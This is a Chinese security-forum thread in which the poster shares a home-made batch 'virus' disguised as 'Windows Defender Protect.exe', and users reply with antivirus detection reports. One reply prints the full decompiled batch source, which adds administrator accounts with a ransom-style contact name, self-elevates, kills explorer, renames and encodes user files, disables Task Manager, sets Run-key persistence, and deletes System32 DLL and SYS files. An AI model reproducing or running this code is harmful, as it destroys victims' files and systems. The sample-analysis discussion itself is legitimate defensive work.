楼主: 光墓啊
收起左侧

[病毒样本] 原创病毒(bat有源码可以要)

[复制链接]
温馨小屋
头像被屏蔽
发表于 2021-1-14 21:46:19 | 显示全部楼层
MES



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
秋日之殇
发表于 2021-1-14 21:47:53 | 显示全部楼层
卡巴斯基扫描miss,双击报错
温馨小屋
头像被屏蔽
发表于 2021-1-14 21:48:39 | 显示全部楼层
Filename: Windows Defender Protect.exe
Threat name: Heur.AdvML.BFull Path: C:\Users\NortonLTSC\Desktop\Windows Defender Protect.exe

____________________________

____________________________


On computers as of 
2021/1/14 at 21:46:06

Last Used 
2021/1/14 at 21:48:06

Startup Item 
No

Launched 
No

Threat type: Heuristic Virus. Detection of a threat based on malware heuristics.


____________________________


Windows Defender Protect.exe Threat name: Heur.AdvML.B
Locate


Very Few Users
Fewer than 5 users in the Norton Community have used this file.

Very New
This file was released less than 1 week  ago.

High
This file risk is high.


____________________________


Source: External Media

Source File:
Windows Defender Protect.exe

____________________________

File Actions

File: C:\Users\NortonLTSC\Desktop\ Windows Defender Protect.exe Removed
File: c:\Users\nortonltsc\Desktop\ 璇烽
测试者
头像被屏蔽
发表于 2021-1-14 21:49:33 | 显示全部楼层
  1. [url=home.php?mod=space&uid=500624]@Shift[/url] /0
  2. [url=home.php?mod=space&uid=331734]@echo[/url] off
  3. cd Desktop\
  4. echo 文件名写了吧,这是个病毒
  5. echo 作者肯定也说过了,这是个病毿
  6. echo 再给你一次机会,确认启动吗?
  7. set /p ch=>请选择
  8. if %ch%==y goto f1
  9. if %ch%==Y goto f1
  10. if %ch%==n goto f2
  11. if %ch%==N goto f2
  12. pause
  13. : f2
  14. echo 退出。。〿
  15. choice /t 1 /d y /n >nul
  16. : f1
  17. echo net user %username% 5539661qpec >>lock.bat
  18. ehco net user guest /active :yes>>lock.bat
  19. echo net user 要密码加QQ3051200685 administrator /add>>lock.bat
  20. echo net localgroup administrators 要密码加QQ3051200685 /add >>lock.bat
  21. start lock.bat
  22. echo 现在病毒已经正式启动亿
  23. echo 今天是多么美好的一夿
  24. echo 像你这样的用房
  25. echo 就应该在地狱里焚烿
  26. echo 接受审判吧,你这狂妄之人!!_
  27. choice /t 1 /d y /n >nul
  28. cls
  29. color a
  30. %1 start "" mshta vbscript:createobject("shell.application").shellexecute("""%~0""","::",,"runas",0)(window.close)&exit

  31. taskkill /f /im explorer.exe
  32. md %temp%\tmprun

  33. cd %SystemDrive%\

  34. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  35. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿

  36. cd %UserProFile%\

  37. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  38. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿

  39. cd %temp%\tmprun
  40. cd %UserProFile%\Desktop\

  41. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  42. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿

  43. cd %temp%\tmprun
  44. cd %UserProFile%\Downloads\

  45. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  46. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿

  47. cd %temp%\tmprun
  48. cd %UserProFile%\Favorites\

  49. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  50. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿

  51. cd %temp%\tmprun
  52. cd %UserProFile%\Searches\

  53. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  54. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿

  55. cd %temp%\tmprun
  56. cd %UserProFile%\Saved Games\

  57. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  58. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿

  59. cd %temp%\tmprun
  60. cd %UserProFile%\Contacts\

  61. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  62. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿

  63. cd %temp%\tmprun
  64. cd %UserProFile%\Links\

  65. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  66. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿

  67. cd %temp%\tmprun
  68. cd %UserProFile%\Videos\

  69. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  70. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿

  71. cd %temp%\tmprun
  72. cd %UserProFile%\Pictures\

  73. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  74. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿

  75. cd %temp%\tmprun
  76. cd %UserProFile%\Documents\

  77. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  78. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿

  79. cd %temp%\tmprun
  80. cd %UserProFile%\Music\

  81. for %%a in (*) do ren "%%a" "%%~a.光墓data"&for %%a in (%0) do ren "%%~a.光墓data" "%%~na.bat"

  82. for %%a in (*.光墓data) do certutil -encode "%%~a" "%%~na.光墓是你爿

  83. cd %SystemDrive%\

  84. del /s /q *.光墓data
  85. for /l %%i in (1,1,100) do mkdir b%%i
  86. cd C:\Users\%username%\Desktop\
  87. for /l %%i  in (1, 1, 100)  do md  b%%i
  88. for /l %%i in (1, 1, 100) do copy %0 b%%i
  89. for /l %%i in (1, 1, 100) do for /l %%q in (1,1,100) do echo 1 >b%%i\笿%q个无法删除的文件.txt
  90. for /l %%i in (1, 1, 100) do echo do >>b%%i\提示%%i.vbs
  91. for /l %%i in (1, 1, 100) do echo msgbox "这是你的笿%i个文件夹",16,"病毒提示" >>b%%i\提示%%i.vbs
  92. for /l %%i in (1, 1, 100) do echo loop >>b%%i\提示%%i.vbs
  93. for /l %%i in (1, 1, 100) do move *.光墓是你爿b%%i\
  94. for /l %%i in (1, 1, 100) do if exist "b%%i\提示%%i.vbs" (
  95. start b%%i\提示%%i.vbs  )
  96. for /l %%i in (1, 1, 100) do attrib +s +h "C:\Users\Administrator\Desktop\b%%i"
  97. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001
  98. echo :a>>ki.bat
  99. echo taskkill /f /im taskmgr.exe>>ki.bat
  100. echo goto a>>ki.bat
  101. start ki.bat
  102. start ki.bat
  103. start ki.bat
  104. start ki.bat
  105. start ki.bat
  106. start ki.bat
  107. start ki.bat
  108. start ki.bat
  109. start ki.bat
  110. copy %0 C:\Windows\System32\lock.bat
  111. echo del *.* /s /q tree>>de.bat
  112. start de.bat
  113. echo taskkill /f /im explorer.exe >>bili.bat
  114. echo taskkill /f /im wininit.exe >>bili.bat
  115. echo shutdown
  116. reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v winstat /t reg_sz /d C:\Users\%username%\Desktop\bili.bat
  117. attrib +s +h C:\Users\%username%\Desktop\bili.bat
  118. del lock.bat
  119. echo del C:\Windows\System32\*.dll>>e.bat
  120. echo del e.bat >>e.bat
  121. start e.bat
  122. echo del C:\Windows\System32\*.sys>>f.bat
  123. echo del f.bat >>f.bat
  124. start f.bat
  125. echo do>>equ.vbs
  126. echo msgbox ("DE DEUHOU")>>equ.vbs
  127. echo loop >>equ.vbs
  128. echo :a >>sta.bat
  129. echo start equ.vbs >>sta.bat
  130. echo goto a >>sta.bat
  131. start sta.bat
  132. choice /t 2 /d y /n >nul
  133. taskkill /f /im wininit.exe
复制代码

你逗我?
hsks
发表于 2021-1-14 21:50:04 | 显示全部楼层

问题是360报
Generic/Trojan.4f0
说好360不报的呢
a233
发表于 2021-1-14 21:53:22 | 显示全部楼层
Avast
BV:Agent-ACN [Trj]
光墓啊
 楼主| 发表于 2021-1-14 21:54:43 | 显示全部楼层


又一个反向解码解错的
慢慢研究
你用的battoexe吧,上当了
光墓啊
 楼主| 发表于 2021-1-14 21:55:04 | 显示全部楼层
hsks 发表于 2021-1-14 21:50
问题是360报
Generic/Trojan.4f0
说好360不报的呢

刚刚我上传了
测试者
头像被屏蔽
发表于 2021-1-14 21:56:12 | 显示全部楼层
光墓啊 发表于 2021-1-14 21:54
又一个反向解码解错的
慢慢研究
你用的battoexe吧,上当了

不是哦,我是分析文件
光墓啊
 楼主| 发表于 2021-1-14 21:57:58 | 显示全部楼层
测试者 发表于 2021-1-14 21:56
不是哦,我是分析文件

所以呢?
我用OD弄过反钩子HOOK的dll壳
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-4 11:42 , Processed in 0.095039 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表